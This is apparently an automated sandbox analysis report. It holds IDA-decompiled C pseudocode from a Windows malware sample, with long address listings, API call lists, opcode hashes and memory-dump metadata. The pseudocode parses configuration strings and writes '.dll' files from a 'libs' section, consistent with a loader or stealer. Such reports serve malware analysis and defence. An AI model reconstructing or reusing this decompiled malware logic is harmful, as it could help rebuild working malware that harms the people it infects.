                                                                                                                                                                        				_v40 = _v40 & 0;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
                                                                                                                                                                        				_t177 = _t60;
                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                        					return _t60 | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t178 = _t177 + 0xc;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
                                                                                                                                                                        				if(_t62 == 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
                                                                                                                                                                        					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
                                                                                                                                                                        						_t180 = _t178 + _t142 * 2 + 2;
                                                                                                                                                                        						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
                                                                                                                                                                        						_v12 = _t71;
                                                                                                                                                                        						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
                                                                                                                                                                        							_t182 = _t180 + _t193 * 2 + 2;
                                                                                                                                                                        							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
                                                                                                                                                                        							_v16 = _t78;
                                                                                                                                                                        							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
                                                                                                                                                                        								_t184 = _t182 + _t197 * 2 + 2;
                                                                                                                                                                        								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
                                                                                                                                                                        								_push( *0x40e228);
                                                                                                                                                                        								_v20 = _t85;
                                                                                                                                                                        								_push(_t184);
                                                                                                                                                                        								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
                                                                                                                                                                        									_t92 = LocalAlloc(0x40, 0x4000); // executed
                                                                                                                                                                        									_t199 = _t92;
                                                                                                                                                                        									_v28 = _t199;
                                                                                                                                                                        									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_t144 = _t94;
                                                                                                                                                                        									_push(0x1a);
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
                                                                                                                                                                        										_push(_v12);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e000))() != 0) {
                                                                                                                                                                        											_v40 = 1;
                                                                                                                                                                        											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24); // executed
                                                                                                                                                                        											if(_v24 > 0) {
                                                                                                                                                                        												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t173 = 0x10;
                                                                                                                                                                        												_t112 = E0040A05F(_t109, _t173);
                                                                                                                                                                        												_t202 = _t112;
                                                                                                                                                                        												_v48 = _t202;
                                                                                                                                                                        												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
                                                                                                                                                                        												_v52 = _v52 & 0x00000000;
                                                                                                                                                                        												_v36 = _t115;
                                                                                                                                                                        												_t116 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        												_v56 = _t116;
                                                                                                                                                                        												_t117 = E00408619( &_v36);
                                                                                                                                                                        												_v32 = _t117;
                                                                                                                                                                        												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        												if(_t165 == 0) {
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        												} else {
                                                                                                                                                                        													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        													if(_t127 != 0) {
                                                                                                                                                                        														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_t187);
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v36);
                                                                                                                                                                        												LocalFree(_v48);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									LocalFree(_t144);
                                                                                                                                                                        									LocalFree(_t199);
                                                                                                                                                                        									_t103 = _v40;
                                                                                                                                                                        									L23:
                                                                                                                                                                        									return _t103;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_v16);
                                                                                                                                                                        								LocalFree(_v20);
                                                                                                                                                                        								_push(0xfffffffa);
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_pop(_t103);
                                                                                                                                                                        								goto L23;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_push(0xfffffffb);
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					_push(0xfffffffd);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t146 = _t62 - _t178;
                                                                                                                                                                        					_t142 = _t146 >> 1;
                                                                                                                                                                        					if(_t146 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t140 = 0xfffffffe;
                                                                                                                                                                        					return _t140;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
















































                                                                                                                                                                        0x00409be4
                                                                                                                                                                        0x00409bf0
                                                                                                                                                                        0x00409bf2
                                                                                                                                                                        0x00409bf5
                                                                                                                                                                        0x00409bf9
                                                                                                                                                                        0x00409bfb
                                                                                                                                                                        0x00409bff
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c01
                                                                                                                                                                        0x00409c14
                                                                                                                                                                        0x00409c18
                                                                                                                                                                        0x00409c1c
                                                                                                                                                                        0x00409c2e
                                                                                                                                                                        0x00409c4a
                                                                                                                                                                        0x00409c58
                                                                                                                                                                        0x00409c78
                                                                                                                                                                        0x00409c83
                                                                                                                                                                        0x00409c8b
                                                                                                                                                                        0x00409c9f
                                                                                                                                                                        0x00409cae
                                                                                                                                                                        0x00409cd7
                                                                                                                                                                        0x00409ce2
                                                                                                                                                                        0x00409cea
                                                                                                                                                                        0x00409cfe
                                                                                                                                                                        0x00409d0b
                                                                                                                                                                        0x00409d3a
                                                                                                                                                                        0x00409d45
                                                                                                                                                                        0x00409d47
                                                                                                                                                                        0x00409d4d
                                                                                                                                                                        0x00409d55
                                                                                                                                                                        0x00409d6c
                                                                                                                                                                        0x00409da6
                                                                                                                                                                        0x00409da8
                                                                                                                                                                        0x00409db6
                                                                                                                                                                        0x00409db9
                                                                                                                                                                        0x00409dbb
                                                                                                                                                                        0x00409dbd
                                                                                                                                                                        0x00409dc4
                                                                                                                                                                        0x00409dc6
                                                                                                                                                                        0x00409dc7
                                                                                                                                                                        0x00409dcd
                                                                                                                                                                        0x00409dd3
                                                                                                                                                                        0x00409ddb
                                                                                                                                                                        0x00409ddc
                                                                                                                                                                        0x00409de1
                                                                                                                                                                        0x00409dea
                                                                                                                                                                        0x00409e00
                                                                                                                                                                        0x00409e0c
                                                                                                                                                                        0x00409e1f
                                                                                                                                                                        0x00409e2b
                                                                                                                                                                        0x00409e2f
                                                                                                                                                                        0x00409e34
                                                                                                                                                                        0x00409e3f
                                                                                                                                                                        0x00409e47
                                                                                                                                                                        0x00409e50
                                                                                                                                                                        0x00409e55
                                                                                                                                                                        0x00409e5c
                                                                                                                                                                        0x00409e5f
                                                                                                                                                                        0x00409e64
                                                                                                                                                                        0x00409e67
                                                                                                                                                                        0x00409e71
                                                                                                                                                                        0x00409e7f
                                                                                                                                                                        0x00409e95
                                                                                                                                                                        0x00409e99
                                                                                                                                                                        0x00409ed6
                                                                                                                                                                        0x00409e9b
                                                                                                                                                                        0x00409eaf
                                                                                                                                                                        0x00409eb1
                                                                                                                                                                        0x00409eb6
                                                                                                                                                                        0x00409ecc
                                                                                                                                                                        0x00409ed1
                                                                                                                                                                        0x00409eb6
                                                                                                                                                                        0x00409eda
                                                                                                                                                                        0x00409ee3
                                                                                                                                                                        0x00409eec
                                                                                                                                                                        0x00409ef5
                                                                                                                                                                        0x00409ef5
                                                                                                                                                                        0x00409e0c
                                                                                                                                                                        0x00409de1
                                                                                                                                                                        0x00409efe
                                                                                                                                                                        0x00409f07
                                                                                                                                                                        0x00409f10
                                                                                                                                                                        0x00409f19
                                                                                                                                                                        0x00409f20
                                                                                                                                                                        0x00409f27
                                                                                                                                                                        0x00409f2d
                                                                                                                                                                        0x00409f30
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409f30
                                                                                                                                                                        0x00409d71
                                                                                                                                                                        0x00409d7a
                                                                                                                                                                        0x00409d83
                                                                                                                                                                        0x00409d8c
                                                                                                                                                                        0x00409d92
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409d94
                                                                                                                                                                        0x00409d10
                                                                                                                                                                        0x00409d19
                                                                                                                                                                        0x00409d22
                                                                                                                                                                        0x00409d28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409d28
                                                                                                                                                                        0x00409cb3
                                                                                                                                                                        0x00409cbc
                                                                                                                                                                        0x00409cc2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409cc2
                                                                                                                                                                        0x00409c5d
                                                                                                                                                                        0x00409c63
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c1e
                                                                                                                                                                        0x00409c20
                                                                                                                                                                        0x00409c22
                                                                                                                                                                        0x00409c24
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c28
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409c28

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 0-3488577920
                                                                                                                                                                        • Opcode ID: e0eeb41d991fee10332494d35f948fcf2730c46131993d2be2dfeab9eb7d5c82
                                                                                                                                                                        • Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
                                                                                                                                                                        • Opcode Fuzzy Hash: e0eeb41d991fee10332494d35f948fcf2730c46131993d2be2dfeab9eb7d5c82
                                                                                                                                                                        • Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040864C(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				void* _t55;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				void* _t64;
                                                                                                                                                                        				void* _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				void* _t83;
                                                                                                                                                                        				void* _t90;
                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				void* _t101;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				void* _t122;
                                                                                                                                                                        				signed int _t137;
                                                                                                                                                                        				intOrPtr _t146;
                                                                                                                                                                        				void* _t150;
                                                                                                                                                                        				void* _t152;
                                                                                                                                                                        
                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                        				_v32 = __edx;
                                                                                                                                                                        				_t152 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45);
                                                                                                                                                                        				_push(_t115);
                                                                                                                                                                        				_v12 = _t152;
                                                                                                                                                                        				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
                                                                                                                                                                        					L25:
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						LocalFree(_t152); // executed
                                                                                                                                                                        					}
                                                                                                                                                                        					return 1;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53);
                                                                                                                                                                        					_v8 = _t55;
                                                                                                                                                                        					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
                                                                                                                                                                        					_v16 = _t150;
                                                                                                                                                                        					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
                                                                                                                                                                        					_t152 = _t61;
                                                                                                                                                                        					_v24 = _t152;
                                                                                                                                                                        					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
                                                                                                                                                                        					_t63 = 0;
                                                                                                                                                                        					_v28 = 0;
                                                                                                                                                                        					if(_t122 == 0) {
                                                                                                                                                                        						L3:
                                                                                                                                                                        						_t8 =  &_v8; // 0x4079e3
                                                                                                                                                                        						_t64 = E0040A3E4(_t115, _t8, 0, _t63); // executed
                                                                                                                                                                        						if(_t64 != 1) {
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
                                                                                                                                                                        						_v20 = _t73;
                                                                                                                                                                        						if(_t73 == 0) {
                                                                                                                                                                        							_t74 = _v12;
                                                                                                                                                                        							if(_t74 != 0) {
                                                                                                                                                                        								LocalFree(_t74);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_t150 != 0) {
                                                                                                                                                                        								LocalFree(_t150);
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L25;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(L"libs");
                                                                                                                                                                        						_t10 =  &_v8; // 0x4079e3
                                                                                                                                                                        						_push( *_t10);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e114))() != 0) {
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t115 = _t115 + _v28 * 2 + 2;
                                                                                                                                                                        						_t81 = _v20 - _t115;
                                                                                                                                                                        						_v20 = _t81 >> 1;
                                                                                                                                                                        						if(_t81 == 0) {
                                                                                                                                                                        							L33:
                                                                                                                                                                        							_t83 = _v12;
                                                                                                                                                                        							if(_t83 != 0) {
                                                                                                                                                                        								LocalFree(_t83);
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v8 == 0) {
                                                                                                                                                                        								L38:
                                                                                                                                                                        								if(_t150 != 0) {
                                                                                                                                                                        									LocalFree(_t150);
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_t152 != 0) {
                                                                                                                                                                        									LocalFree(_t152);
                                                                                                                                                                        								}
                                                                                                                                                                        								return 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								L37:
                                                                                                                                                                        								goto L38;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
                                                                                                                                                                        						if(_t90 == 0) {
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t91 = _t90 - _t115;
                                                                                                                                                                        						_t92 = _t91 >> 1;
                                                                                                                                                                        						_v28 = _t91 >> 1;
                                                                                                                                                                        						if(_t91 == 0) {
                                                                                                                                                                        							goto L33;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
                                                                                                                                                                        							L16:
                                                                                                                                                                        							_t150 = _v16;
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
                                                                                                                                                                        							_t152 = _v24;
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
                                                                                                                                                                        						_t146 =  *0x40e258; // 0x6d5af8
                                                                                                                                                                        						_t101 = E0040A503(_t100, _t146);
                                                                                                                                                                        						_t150 = _v16;
                                                                                                                                                                        						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
                                                                                                                                                                        						_t137 =  *0x40e374; // 0x6ee640
                                                                                                                                                                        						_v28 = _t137;
                                                                                                                                                                        						_v20 = _t103;
                                                                                                                                                                        						_t104 = E00408619( &_v28);
                                                                                                                                                                        						_t152 = _v24;
                                                                                                                                                                        						_v28 = _t104;
                                                                                                                                                                        						E00408495(_t152, _t104, _t103); // executed
                                                                                                                                                                        						_t106 = _v28;
                                                                                                                                                                        						if(_t106 != 0) {
                                                                                                                                                                        							LocalFree(_t106);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t107 = _v20;
                                                                                                                                                                        						if(_t107 != 0) {
                                                                                                                                                                        							LocalFree(_t107);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L17;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t111 = _t122 - _t115;
                                                                                                                                                                        					_t63 = _t111 >> 1;
                                                                                                                                                                        					_v28 = _t111 >> 1;
                                                                                                                                                                        					if(_t111 < 0) {
                                                                                                                                                                        						_t112 = _v12;
                                                                                                                                                                        						if(_t112 != 0) {
                                                                                                                                                                        							LocalFree(_t112);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t37 =  &_v8; // 0x4079e3
                                                                                                                                                                        						_t113 =  *_t37;
                                                                                                                                                                        						if(_t113 == 0) {
                                                                                                                                                                        							goto L38;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							LocalFree(_t113);
                                                                                                                                                                        							goto L37;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t150 != 0) {
                                                                                                                                                                        						LocalFree(_t150);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t152 != 0) {
                                                                                                                                                                        						LocalFree(_t152);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
                                                                                                                                                                        					_t115 = _t34;
                                                                                                                                                                        					_push(_t115);
                                                                                                                                                                        				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
                                                                                                                                                                        				_t152 = _v12;
                                                                                                                                                                        				goto L25;
                                                                                                                                                                        			}


































                                                                                                                                                                        0x0040865f
                                                                                                                                                                        0x00408663
                                                                                                                                                                        0x00408675
                                                                                                                                                                        0x00408677
                                                                                                                                                                        0x00408678
                                                                                                                                                                        0x00408680
                                                                                                                                                                        0x00408888
                                                                                                                                                                        0x0040888a
                                                                                                                                                                        0x0040888d
                                                                                                                                                                        0x0040888d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408686
                                                                                                                                                                        0x00408686
                                                                                                                                                                        0x00408699
                                                                                                                                                                        0x004086a8
                                                                                                                                                                        0x004086ba
                                                                                                                                                                        0x004086c3
                                                                                                                                                                        0x004086cd
                                                                                                                                                                        0x004086db
                                                                                                                                                                        0x004086de
                                                                                                                                                                        0x004086e3
                                                                                                                                                                        0x004086e5
                                                                                                                                                                        0x004086e7
                                                                                                                                                                        0x004086ec
                                                                                                                                                                        0x004086fd
                                                                                                                                                                        0x00408700
                                                                                                                                                                        0x00408705
                                                                                                                                                                        0x0040870f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408721
                                                                                                                                                                        0x00408723
                                                                                                                                                                        0x00408728
                                                                                                                                                                        0x004088ea
                                                                                                                                                                        0x004088ef
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088f2
                                                                                                                                                                        0x004088fc
                                                                                                                                                                        0x00408901
                                                                                                                                                                        0x00408901
                                                                                                                                                                        0x00408909
                                                                                                                                                                        0x00408910
                                                                                                                                                                        0x00408910
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408909
                                                                                                                                                                        0x00408734
                                                                                                                                                                        0x00408739
                                                                                                                                                                        0x00408739
                                                                                                                                                                        0x00408740
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040874f
                                                                                                                                                                        0x00408752
                                                                                                                                                                        0x00408756
                                                                                                                                                                        0x00408759
                                                                                                                                                                        0x004088b3
                                                                                                                                                                        0x004088b3
                                                                                                                                                                        0x004088b8
                                                                                                                                                                        0x004088bb
                                                                                                                                                                        0x004088bb
                                                                                                                                                                        0x004088c5
                                                                                                                                                                        0x004088d0
                                                                                                                                                                        0x004088d2
                                                                                                                                                                        0x004088d5
                                                                                                                                                                        0x004088d5
                                                                                                                                                                        0x004088dd
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x004088e0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088c7
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088c5
                                                                                                                                                                        0x0040876b
                                                                                                                                                                        0x0040876f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408775
                                                                                                                                                                        0x00408777
                                                                                                                                                                        0x00408779
                                                                                                                                                                        0x0040877c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408793
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040883b
                                                                                                                                                                        0x004087b0
                                                                                                                                                                        0x00408838
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408838
                                                                                                                                                                        0x004087c9
                                                                                                                                                                        0x004087ce
                                                                                                                                                                        0x004087d6
                                                                                                                                                                        0x004087db
                                                                                                                                                                        0x004087ee
                                                                                                                                                                        0x004087f3
                                                                                                                                                                        0x004087fb
                                                                                                                                                                        0x00408801
                                                                                                                                                                        0x00408804
                                                                                                                                                                        0x0040880a
                                                                                                                                                                        0x00408811
                                                                                                                                                                        0x00408814
                                                                                                                                                                        0x00408819
                                                                                                                                                                        0x0040881f
                                                                                                                                                                        0x00408822
                                                                                                                                                                        0x00408822
                                                                                                                                                                        0x00408828
                                                                                                                                                                        0x0040882d
                                                                                                                                                                        0x00408830
                                                                                                                                                                        0x00408830
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040882d
                                                                                                                                                                        0x004086f0
                                                                                                                                                                        0x004086f2
                                                                                                                                                                        0x004086f4
                                                                                                                                                                        0x004086f7
                                                                                                                                                                        0x0040889b
                                                                                                                                                                        0x004088a0
                                                                                                                                                                        0x004088a3
                                                                                                                                                                        0x004088a3
                                                                                                                                                                        0x004088a9
                                                                                                                                                                        0x004088a9
                                                                                                                                                                        0x004088ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088b0
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004088ca
                                                                                                                                                                        0x004088ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040883e
                                                                                                                                                                        0x00408842
                                                                                                                                                                        0x00408847
                                                                                                                                                                        0x00408847
                                                                                                                                                                        0x0040884f
                                                                                                                                                                        0x00408852
                                                                                                                                                                        0x00408852
                                                                                                                                                                        0x0040885a
                                                                                                                                                                        0x0040885d
                                                                                                                                                                        0x0040885d
                                                                                                                                                                        0x00408871
                                                                                                                                                                        0x00408871
                                                                                                                                                                        0x00408879
                                                                                                                                                                        0x0040887c
                                                                                                                                                                        0x00408885
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408847
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408852
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0040885D
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408901
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00408910
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc
                                                                                                                                                                        • String ID: .dll$@n$libs$y@$y@
                                                                                                                                                                        • API String ID: 3098330729-1836047952
                                                                                                                                                                        • Opcode ID: b6baaf1c4c7f1a018e7c964b8c0473864a6ac247d4e3265520aa8e21be5a1454
                                                                                                                                                                        • Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
                                                                                                                                                                        • Opcode Fuzzy Hash: b6baaf1c4c7f1a018e7c964b8c0473864a6ac247d4e3265520aa8e21be5a1454
                                                                                                                                                                        • Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 31%
                                                                                                                                                                        			E00407C62(short* __ecx, intOrPtr _a4, WCHAR* _a8, LPCWSTR* _a12) {
                                                                                                                                                                        				signed int _v8;
